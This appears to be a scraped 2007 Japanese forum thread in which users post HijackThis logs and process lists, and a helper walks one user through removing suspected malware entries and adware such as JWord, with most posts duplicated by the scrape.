C:\WINDOWS\System32\adirss.exe
C:\WINDOWS\System32\Tablet.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\Yahoo!J\Messenger\ypagerj.exe
C:\Program Files\MSN Messenger\msnmsgr.exe
C:\Program Files\Apoint2K\Apntex.exe
C:\WINDOWS\System32\conime.exe
C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Java\jre1.5.0_08\bin\jucheck.exe
C:\WINDOWS\System32\wbem\wmiapsrv.exe
C:\Program Files\Fenrir & Co\Sleipnir\bin\Sleipnir.exe
C:\Documents and Settings\ユーザー名\デスクトップ\HijackThis\HijackThis.exe
C:\Program Files\Apoint2K\Apoint.exe
C:\Program Files\Java\jre1.5.0_08\bin\jusched.exe
C:\Program Files\MessengerPlus! 3\MsgPlus.exe
C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
C:\Program Files\QuickTime\qttask.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\WINDOWS\System32\adirss.exe
C:\WINDOWS\System32\Tablet.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\Yahoo!J\Messenger\ypagerj.exe
C:\Program Files\MSN Messenger\msnmsgr.exe
C:\Program Files\Apoint2K\Apntex.exe
C:\WINDOWS\System32\conime.exe
C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Java\jre1.5.0_08\bin\jucheck.exe
C:\WINDOWS\System32\wbem\wmiapsrv.exe
C:\Program Files\Fenrir & Co\Sleipnir\bin\Sleipnir.exe
C:\Documents and Settings\ユーザー名\デスクトップ\HijackThis\HijackThis.exe
131 :名無しさん@お腹いっぱい。:2007/01/11(木) 18:30:06
O2 - BHO: Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\yt.dll
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: IdnHelperObj Class - {118CE65F-5D86-4AEA-A9BD-94F92B89119F} - C:\WINDOWS\DOWNLO~1\CNSMIN~1.DLL
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O2 - BHO: (no name) - {67982BB7-0F95-44C5-92DC-E3AF3DC19D6D} - C:\Program Files\Video ActiveX Object\isaddon.dll (file missing)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O3 - Toolbar: ラジオ(&R) - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: &Yahoo!ツールバー - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\yt.dll
O4 - HKLM\..\Run: [IMJPMIG8.1] C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [S3hotkey] S3hotkey.exe
O4 - HKLM\..\Run: [S3TRAY2] S3tray2.exe
O4 - HKLM\..\Run: [PCTVOICE] pctspk.exe
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: IdnHelperObj Class - {118CE65F-5D86-4AEA-A9BD-94F92B89119F} - C:\WINDOWS\DOWNLO~1\CNSMIN~1.DLL
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O2 - BHO: (no name) - {67982BB7-0F95-44C5-92DC-E3AF3DC19D6D} - C:\Program Files\Video ActiveX Object\isaddon.dll (file missing)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O3 - Toolbar: ラジオ(&R) - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: &Yahoo!ツールバー - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\yt.dll
O4 - HKLM\..\Run: [IMJPMIG8.1] C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [S3hotkey] S3hotkey.exe
O4 - HKLM\..\Run: [S3TRAY2] S3tray2.exe
O4 - HKLM\..\Run: [PCTVOICE] pctspk.exe
132 :名無しさん@お腹いっぱい。:2007/01/11(木) 18:31:01
O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint2K\Apoint.exe
O4 - HKLM\..\Run: [{262CF15F-287A-4D26-8EAF-3B28BF7F018F}_UserSetup] C:\PROGRA~1\SHARP\PAGEDE~1\UserInit.exe
O4 - HKLM\..\Run: [DialApp] C:\Program Files\SHARP\mt\3.0\bin\DialMng.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.5.0_08\bin\jusched.exe"
O4 - HKLM\..\Run: [MessengerPlus3] "C:\Program Files\MessengerPlus! 3\MsgPlus.exe"
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [sysinter] C:\WINDOWS\System32\adirss.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [MessengerPlus3] "C:\Program Files\MessengerPlus! 3\MsgPlus.exe" /WinStart
O4 - HKCU\..\Run: [Yahoo!Japan Pager] "C:\Program Files\Yahoo!J\Messenger\ypagerj.exe" -quiet
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\Program Files\Yahoo!J\Messenger\ypagerj.exe" -quiet
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\MSN Messenger\msnmsgr.exe" /background
O4 - HKLM\..\Run: [{262CF15F-287A-4D26-8EAF-3B28BF7F018F}_UserSetup] C:\PROGRA~1\SHARP\PAGEDE~1\UserInit.exe
O4 - HKLM\..\Run: [DialApp] C:\Program Files\SHARP\mt\3.0\bin\DialMng.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.5.0_08\bin\jusched.exe"
O4 - HKLM\..\Run: [MessengerPlus3] "C:\Program Files\MessengerPlus! 3\MsgPlus.exe"
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [sysinter] C:\WINDOWS\System32\adirss.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [MessengerPlus3] "C:\Program Files\MessengerPlus! 3\MsgPlus.exe" /WinStart
O4 - HKCU\..\Run: [Yahoo!Japan Pager] "C:\Program Files\Yahoo!J\Messenger\ypagerj.exe" -quiet
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\Program Files\Yahoo!J\Messenger\ypagerj.exe" -quiet
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\MSN Messenger\msnmsgr.exe" /background
133 :名無しさん@お腹いっぱい。:2007/01/11(木) 18:32:18
O8 - Extra context menu item: CyberSyndrome 一発プロキシ設定(&X) - C:\WINDOWS\WEB\iprxs.htm
O8 - Extra context menu item: JWordでウェブ検索(&J) - res://C:\WINDOWS\DOWNLO~1\CnsMin.dll/203
O8 - Extra context menu item: SHARP ぺたっ!翻訳 - res://C:\Program Files\Sharp\PowerEJ\BIN\QuickTrans.ocx/234
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun の Java コンソール - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra button: Yahoo!メッセンジャー - {CEBF73C0-BA2E-11d4-A73A-00508B33FB82} - C:\PROGRA~1\YAHOO!J\MESSEN~1\YPAGERJ.EXE
O9 - Extra 'Tools' menuitem: Yahoo!メッセンジャー - {CEBF73C0-BA2E-11d4-A73A-00508B33FB82} - C:\PROGRA~1\YAHOO!J\MESSEN~1\YPAGERJ.EXE
O14 - IERESET.INF: START_PAGE_URL=http://www.spacetown.ne.jp/
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
O16 - DPF: {2931566C-B8A6-46C5-BF4D-E6AB9251E953} (Nexon Package Manager Control) - http://www.nexon.co.jp/JP/f/ActiveX/Public/nxpm.cab
O16 - DPF: {4A88CB42-BBFE-496A-884F-98E8AC316292} (YJInstStarter Control) - http://dl.toolbar.yahoo.co.jp/dl/installs/yjinst.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1149661454587
O16 - DPF: {67DABFBF-D0AB-41FA-9C46-CC0F21721616} (DivXBrowserPlugin Object) - http://go.divx.com/plugin/DivXBrowserPlugin.cab
O8 - Extra context menu item: JWordでウェブ検索(&J) - res://C:\WINDOWS\DOWNLO~1\CnsMin.dll/203
O8 - Extra context menu item: SHARP ぺたっ!翻訳 - res://C:\Program Files\Sharp\PowerEJ\BIN\QuickTrans.ocx/234
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun の Java コンソール - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra button: Yahoo!メッセンジャー - {CEBF73C0-BA2E-11d4-A73A-00508B33FB82} - C:\PROGRA~1\YAHOO!J\MESSEN~1\YPAGERJ.EXE
O9 - Extra 'Tools' menuitem: Yahoo!メッセンジャー - {CEBF73C0-BA2E-11d4-A73A-00508B33FB82} - C:\PROGRA~1\YAHOO!J\MESSEN~1\YPAGERJ.EXE
O14 - IERESET.INF: START_PAGE_URL=http://www.spacetown.ne.jp/
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
O16 - DPF: {2931566C-B8A6-46C5-BF4D-E6AB9251E953} (Nexon Package Manager Control) - http://www.nexon.co.jp/JP/f/ActiveX/Public/nxpm.cab
O16 - DPF: {4A88CB42-BBFE-496A-884F-98E8AC316292} (YJInstStarter Control) - http://dl.toolbar.yahoo.co.jp/dl/installs/yjinst.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1149661454587
O16 - DPF: {67DABFBF-D0AB-41FA-9C46-CC0F21721616} (DivXBrowserPlugin Object) - http://go.divx.com/plugin/DivXBrowserPlugin.cab
134 :124:2007/01/11(木) 18:33:37
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1149661420909
O16 - DPF: {7A5F1DBB-5357-4601-8084-0B111A24BEE8} (EntoiSketch Program) - http://upload.cururu.jp/common/editor/EntoiSketchControl.cab
O16 - DPF: {8BCAB742-72F8-4119-A4B4-8F639A6E27B2} (CNaverImageUploadCtl Object) - http://myhome.cururu.jp/common/editor/NIU.CAB
O16 - DPF: {B905F63D-7489-4B3D-9B62-49A1B8647E2A} (HgPluginJP21 Class) - http://down.hangame.co.jp/jp/dist/hgstart/HGPluginJP21.cab
O16 - DPF: {CDA94496-ED6F-4C72-94C8-2C485DC63390} (VCDS Control) - http://vcds-client.nefficient.co.kr/vcds-client/vCDS.CAB
O16 - DPF: {E0BE586C-7C66-4909-94D6-D18BBBDD6373} (ファイルバンクランチャー) - http://www.filebank.co.jp/setup/win/fbx2.cab
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - "C:\PROGRA~1\MSNMES~1\msgrapp.dll" (file missing)
O21 - SSODL: carbinyl - {8d8c2387-7f80-4022-9be6-43630a969558} - (no file)
O16 - DPF: {7A5F1DBB-5357-4601-8084-0B111A24BEE8} (EntoiSketch Program) - http://upload.cururu.jp/common/editor/EntoiSketchControl.cab
O16 - DPF: {8BCAB742-72F8-4119-A4B4-8F639A6E27B2} (CNaverImageUploadCtl Object) - http://myhome.cururu.jp/common/editor/NIU.CAB
O16 - DPF: {B905F63D-7489-4B3D-9B62-49A1B8647E2A} (HgPluginJP21 Class) - http://down.hangame.co.jp/jp/dist/hgstart/HGPluginJP21.cab
O16 - DPF: {CDA94496-ED6F-4C72-94C8-2C485DC63390} (VCDS Control) - http://vcds-client.nefficient.co.kr/vcds-client/vCDS.CAB
O16 - DPF: {E0BE586C-7C66-4909-94D6-D18BBBDD6373} (ファイルバンクランチャー) - http://www.filebank.co.jp/setup/win/fbx2.cab
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - "C:\PROGRA~1\MSNMES~1\msgrapp.dll" (file missing)
O21 - SSODL: carbinyl - {8d8c2387-7f80-4022-9be6-43630a969558} - (no file)
135 :124:2007/01/11(木) 18:34:23
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - Unknown owner - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
O23 - Service: avast! Antivirus - Unknown owner - C:\Program Files\Alwil Software\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - Unknown owner - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe" /service (file missing)
O23 - Service: avast! Web Scanner - Unknown owner - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe" /service (file missing)
O23 - Service: AVSync Manager (AvSynMgr) - Network Associates, Inc. - C:\Program Files\Network Associates\VirusScan\Avsynmgr.exe
O23 - Service: iPod Service - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: McShield - Unknown owner - C:\Program Files\Common Files\Network Associates\McShield\Mcshield.exe
O23 - Service: ieupdater (Microsoft IE Updater) - Unknown owner - C:\DOCUME~1\ユーザー名\LOCALS~1\Temp\ieupdate.exe
O23 - Service: TabletService - Wacom Technology, Corp. - C:\WINDOWS\System32\Tablet.exe
O23 - Service: avast! Antivirus - Unknown owner - C:\Program Files\Alwil Software\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - Unknown owner - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe" /service (file missing)
O23 - Service: avast! Web Scanner - Unknown owner - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe" /service (file missing)
O23 - Service: AVSync Manager (AvSynMgr) - Network Associates, Inc. - C:\Program Files\Network Associates\VirusScan\Avsynmgr.exe
O23 - Service: iPod Service - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: McShield - Unknown owner - C:\Program Files\Common Files\Network Associates\McShield\Mcshield.exe
O23 - Service: ieupdater (Microsoft IE Updater) - Unknown owner - C:\DOCUME~1\ユーザー名\LOCALS~1\Temp\ieupdate.exe
O23 - Service: TabletService - Wacom Technology, Corp. - C:\WINDOWS\System32\Tablet.exe
136 :名無しさん@お腹いっぱい。:2007/01/11(木) 18:54:10
1000まで続けるんですかね
137 : ◆N9P3SuvBPo :2007/01/11(木) 19:01:53
>128
英文メールのメッセージをググったら
シマンテックのサイトが出てきて、そのシマンテックのサイトを参考にした。
>レジストリ内にexplore exeが作られてるから
>しかし、ソレが無い!
と言うことは、感染はしていないと思いますが…
ノートン先生でスキャンして、このW32.Mytob.QU@mmというウイルスを
検出されたとき、どのような処置を取りました?
>129
いくつか問題のエントリーがあります。
さらにウイルス対策ソフトが重複されてます。
現在ログを解析中(飯の時間だ)なので今しばらくお待ちを。
英文メールのメッセージをググったら
シマンテックのサイトが出てきて、そのシマンテックのサイトを参考にした。
>レジストリ内にexplore exeが作られてるから
>しかし、ソレが無い!
と言うことは、感染はしていないと思いますが…
ノートン先生でスキャンして、このW32.Mytob.QU@mmというウイルスを
検出されたとき、どのような処置を取りました?
>129
いくつか問題のエントリーがあります。
さらにウイルス対策ソフトが重複されてます。
現在ログを解析中(飯の時間だ)なので今しばらくお待ちを。
138 :名無しさん@お腹いっぱい。:2007/01/11(木) 19:25:31
>>129
> C:\WINDOWS\System32\adirss.exe
> O4 - HKLM\..\Run: [sysinter] C:\WINDOWS\System32\adirss.exe
あやしいお
> C:\WINDOWS\System32\adirss.exe
> O4 - HKLM\..\Run: [sysinter] C:\WINDOWS\System32\adirss.exe
あやしいお
139 :124:2007/01/11(木) 20:00:04
>>137
ありがとうございます。待ってます。
>>138
それを調べてみたら、
http://www.symantec.co.jp/region/jp/avcenter/venc/data/[email protected]
が出ました。これっぽいです・・・。
ありがとうございます。待ってます。
>>138
それを調べてみたら、
http://www.symantec.co.jp/region/jp/avcenter/venc/data/[email protected]
が出ました。これっぽいです・・・。
140 :名無しさん@お腹いっぱい。:2007/01/11(木) 20:06:53
何処で聞いたらいいか分からないのでココで聞きます。
一応テンプレ
【使用OS】 WindowsXP Professional x64Edition
【MicrosoftUpdate】 してる
【使用セキュリティソフト】 なし
【セキュリティソフトの定義ファイルは最新の状態であるか】
【ルータの有無】 corega CG-WLBARAG-P
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
【どんな症状が出るか】
【症状が出る前に何をやったか】
【症状を解決しようとどのような処置を取ったか】
【その他の質問】
WindowsXP Professional x64Editionに対応しているアンチウイルスソフトってありますか?
探してるんですけど・・・無い!ドコ?(T-T ))(( T-T)ドコ?
一応テンプレ
【使用OS】 WindowsXP Professional x64Edition
【MicrosoftUpdate】 してる
【使用セキュリティソフト】 なし
【セキュリティソフトの定義ファイルは最新の状態であるか】
【ルータの有無】 corega CG-WLBARAG-P
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
【どんな症状が出るか】
【症状が出る前に何をやったか】
【症状を解決しようとどのような処置を取ったか】
【その他の質問】
WindowsXP Professional x64Editionに対応しているアンチウイルスソフトってありますか?
探してるんですけど・・・無い!ドコ?(T-T ))(( T-T)ドコ?
141 : ◆N9P3SuvBPo :2007/01/11(木) 20:14:46
充電完了!
>124さん
Avastとマカフィーが両方インストールされていますよ。
対策ソフトの重複はPCを重くする原因となります。
Avastが最新と言う事なので、マカフィーのほうをアンインストールしてください。
VirusScanという名前でコンパネ→プログラムの追加と削除にあると思います。
そしてもう1つアンインストール対象があります。
JWordという名前のプログラムです。
必要無ければ、アンインストール推奨です。
アンインストールが終了したら、セーフモードで起動してください。
セーフモード中はネットに繋げないので、以下の文はメモ帳にコピって参照してください。
コンパネ→管理ツール→サービス
一覧にieupdater (Microsoft IE Updater)という名前を探して、見付かったらプロパティ画面を開き、
サービスが開始されていたら、「停止」をクリックしてサービスを止めます。
さらにスタートアップの種類を「無効」に選択して、設定を有効にするため「適用」をクリックして閉じます。
>124さん
Avastとマカフィーが両方インストールされていますよ。
対策ソフトの重複はPCを重くする原因となります。
Avastが最新と言う事なので、マカフィーのほうをアンインストールしてください。
VirusScanという名前でコンパネ→プログラムの追加と削除にあると思います。
そしてもう1つアンインストール対象があります。
JWordという名前のプログラムです。
必要無ければ、アンインストール推奨です。
アンインストールが終了したら、セーフモードで起動してください。
セーフモード中はネットに繋げないので、以下の文はメモ帳にコピって参照してください。
コンパネ→管理ツール→サービス
一覧にieupdater (Microsoft IE Updater)という名前を探して、見付かったらプロパティ画面を開き、
サービスが開始されていたら、「停止」をクリックしてサービスを止めます。
さらにスタートアップの種類を「無効」に選択して、設定を有効にするため「適用」をクリックして閉じます。
142 : ◆N9P3SuvBPo :2007/01/11(木) 20:15:28
全ての窓を閉じてから、HijackThisを起動して
以下のエントリーをFIXしてください。(無くなっているものはスルー)
O2 - BHO: IdnHelperObj Class - {118CE65F-5D86-4AEA-A9BD-94F92B89119F} - C:\WINDOWS\DOWNLO~1\CNSMIN~1.DLL ←JWord
O4 - HKLM\..\Run: [sysinter] C:\WINDOWS\System32\adirss.exe ←何らかのマルウェア
O8 - Extra context menu item: JWordでウェブ検索(&J) - res://C:\WINDOWS\DOWNLO~1\CnsMin.dll/203 ←JWord
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm ←Alexaツールバー
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm ←上記に同じ
O16エントリー全部(必要な物は再度ダウンロードすることが可能です)
O21 - SSODL: carbinyl - {8d8c2387-7f80-4022-9be6-43630a969558} - (no file) ←FIX対象です
O23 - Service: ieupdater (Microsoft IE Updater) - Unknown owner - C:\DOCUME~1\ユーザー名\LOCALS~1\Temp\ieupdate.exe ←上記の作業により無くなっていると思います。
ここまで終わりましたら、PCを再起動してF8連打でWindows拡張オプションを開いて
「ブートのログ作成を有効にする」を選択して、通常モードで起動してください。
ブートのログはC:\Windowsフォルダ内にntbtlog.txtという名前で作成されます。
ntbtlog.txtはアップローダにupってください。
それと症状の変化の報告も。
以下のエントリーをFIXしてください。(無くなっているものはスルー)
O2 - BHO: IdnHelperObj Class - {118CE65F-5D86-4AEA-A9BD-94F92B89119F} - C:\WINDOWS\DOWNLO~1\CNSMIN~1.DLL ←JWord
O4 - HKLM\..\Run: [sysinter] C:\WINDOWS\System32\adirss.exe ←何らかのマルウェア
O8 - Extra context menu item: JWordでウェブ検索(&J) - res://C:\WINDOWS\DOWNLO~1\CnsMin.dll/203 ←JWord
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm ←Alexaツールバー
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm ←上記に同じ
O16エントリー全部(必要な物は再度ダウンロードすることが可能です)
O21 - SSODL: carbinyl - {8d8c2387-7f80-4022-9be6-43630a969558} - (no file) ←FIX対象です
O23 - Service: ieupdater (Microsoft IE Updater) - Unknown owner - C:\DOCUME~1\ユーザー名\LOCALS~1\Temp\ieupdate.exe ←上記の作業により無くなっていると思います。
ここまで終わりましたら、PCを再起動してF8連打でWindows拡張オプションを開いて
「ブートのログ作成を有効にする」を選択して、通常モードで起動してください。
ブートのログはC:\Windowsフォルダ内にntbtlog.txtという名前で作成されます。
ntbtlog.txtはアップローダにupってください。
それと症状の変化の報告も。
143 :名無しさん@お腹いっぱい。:2007/01/11(木) 20:19:31
http://www.rawmanga.com/
このサイト開いたらウイルスかスパイウェアがあったらしくバスターが反応しました
その後スキャンしたらウイルスを駆除できませんとでます・・・・新型でしょうか?
このサイト開いたらウイルスかスパイウェアがあったらしくバスターが反応しました
その後スキャンしたらウイルスを駆除できませんとでます・・・・新型でしょうか?
144 :140:2007/01/11(木) 20:50:19
自己解決しました
145 :名無しさん@お腹いっぱい。:2007/01/11(木) 20:57:41
ネットでの中傷・名誉毀損やプライバシー侵害について、ネット事業者や総務省が意見を募集中ですよ。
ネット上で "中傷・名誉毀損、プライバシー侵害、著作権侵害" をした人物の住所や氏名を、
同意なしで開示できるガイドライン(案)について、ネット事業者や総務省が意見を募集しています。
ネット上のプライバシー侵害や名誉毀損、発信者情報開示へガイドライン
ttp://internet.watch.impress.co.jp/cda/news/2007/01/10/14420.html
プロバイダ責任制限法ガイドライン等検討協議会
「プロバイダ責任制限法 発信者情報開示関係ガイドライン(案)」に係る意見募集について
意見提出期限
平成19年2月9日(金)正午
ttp://www.telesa.or.jp/consortium/provider/2007/20070110.htm
総務省(報道資料)
プロバイダ責任制限法第4条に基づく発信者情報開示制度の
円滑かつ適切な運用を支援する取組
ttp://www.soumu.go.jp/s-news/2007/070110_1.html
関連スレ
【ネット】 掲示板などで"中傷・プライバシー侵害"した人の住所・氏名、同意なしで開示へ…業界が新指針★9
http://news22.2ch.net/test/read.cgi/newsplus/1167340902/
【ネット】プライバシー侵害の書き込み、ISPが発信者情報を開示する基準を明確化 業界団体が新たなガイドライン[12/26]
http://news21.2ch.net/test/read.cgi/bizplus/1167133741/
「2ちゃん叩き潰す」だから総務省が意見出せってよ
http://news20.2ch.net/test/read.cgi/news/1168416480/
ネット上で "中傷・名誉毀損、プライバシー侵害、著作権侵害" をした人物の住所や氏名を、
同意なしで開示できるガイドライン(案)について、ネット事業者や総務省が意見を募集しています。
ネット上のプライバシー侵害や名誉毀損、発信者情報開示へガイドライン
ttp://internet.watch.impress.co.jp/cda/news/2007/01/10/14420.html
プロバイダ責任制限法ガイドライン等検討協議会
「プロバイダ責任制限法 発信者情報開示関係ガイドライン(案)」に係る意見募集について
意見提出期限
平成19年2月9日(金)正午
ttp://www.telesa.or.jp/consortium/provider/2007/20070110.htm
総務省(報道資料)
プロバイダ責任制限法第4条に基づく発信者情報開示制度の
円滑かつ適切な運用を支援する取組
ttp://www.soumu.go.jp/s-news/2007/070110_1.html
関連スレ
【ネット】 掲示板などで"中傷・プライバシー侵害"した人の住所・氏名、同意なしで開示へ…業界が新指針★9
http://news22.2ch.net/test/read.cgi/newsplus/1167340902/
【ネット】プライバシー侵害の書き込み、ISPが発信者情報を開示する基準を明確化 業界団体が新たなガイドライン[12/26]
http://news21.2ch.net/test/read.cgi/bizplus/1167133741/
「2ちゃん叩き潰す」だから総務省が意見出せってよ
http://news20.2ch.net/test/read.cgi/news/1168416480/
146 :モモ:2007/01/11(木) 20:58:36
ウイルスかどうか分かりませんがパソコン終了時に毎回「重要な更新をインストールしてコンピューターの電源を切るには
[電源を切る]をクリックしてください。」と表示されます。
これは、前までは1ヶ月に1回ぐらいしかなかったのですが毎終了時に表示されるようになりました。
これは、ウイルスが入ったからなのでしょうか?
[電源を切る]をクリックしてください。」と表示されます。
これは、前までは1ヶ月に1回ぐらいしかなかったのですが毎終了時に表示されるようになりました。
これは、ウイルスが入ったからなのでしょうか?
147 : ◆N9P3SuvBPo :2007/01/11(木) 21:02:35
あっ!
>131見逃していたエントリーです
O2 - BHO: (no name) - {67982BB7-0F95-44C5-92DC-E3AF3DC19D6D} - C:\Program Files\Video ActiveX Object\isaddon.dll (file missing)
こちらもFIX対象となります。(通常モードでも問題無くFIXできるかと(全ての窓を閉じた状態で))
すいません…
>131見逃していたエントリーです
O2 - BHO: (no name) - {67982BB7-0F95-44C5-92DC-E3AF3DC19D6D} - C:\Program Files\Video ActiveX Object\isaddon.dll (file missing)
こちらもFIX対象となります。(通常モードでも問題無くFIXできるかと(全ての窓を閉じた状態で))
すいません…
148 :名無しさん@お腹いっぱい。:2007/01/11(木) 21:30:13
149 : ◆N9P3SuvBPo :2007/01/11(木) 21:39:12
>148
考えられない
考えられない
150 : ◆N9P3SuvBPo :2007/01/11(木) 23:17:47
明日の夜また来ます。
151 :名無しさん@お腹いっぱい。:2007/01/11(木) 23:19:46
152 :名無しさん@お腹いっぱい。:2007/01/11(木) 23:40:31
パソコンが変になったので携帯からなんですが
今共有ファイルによくわからないまま初めて挑戦したのですがいきなり感染してしまいました。
OSはWindows XPでルータはなしです。
後よくわからないのですがSpywereと書いてありました
どうすればいいか教えてください、かなり焦ってます
今共有ファイルによくわからないまま初めて挑戦したのですがいきなり感染してしまいました。
OSはWindows XPでルータはなしです。
後よくわからないのですがSpywereと書いてありました
どうすればいいか教えてください、かなり焦ってます
153 :名無しさん@お腹いっぱい。:2007/01/11(木) 23:52:19
>>152
Spybotなどのアンチスパイウェアソフトで駆除
Spybotなどのアンチスパイウェアソフトで駆除
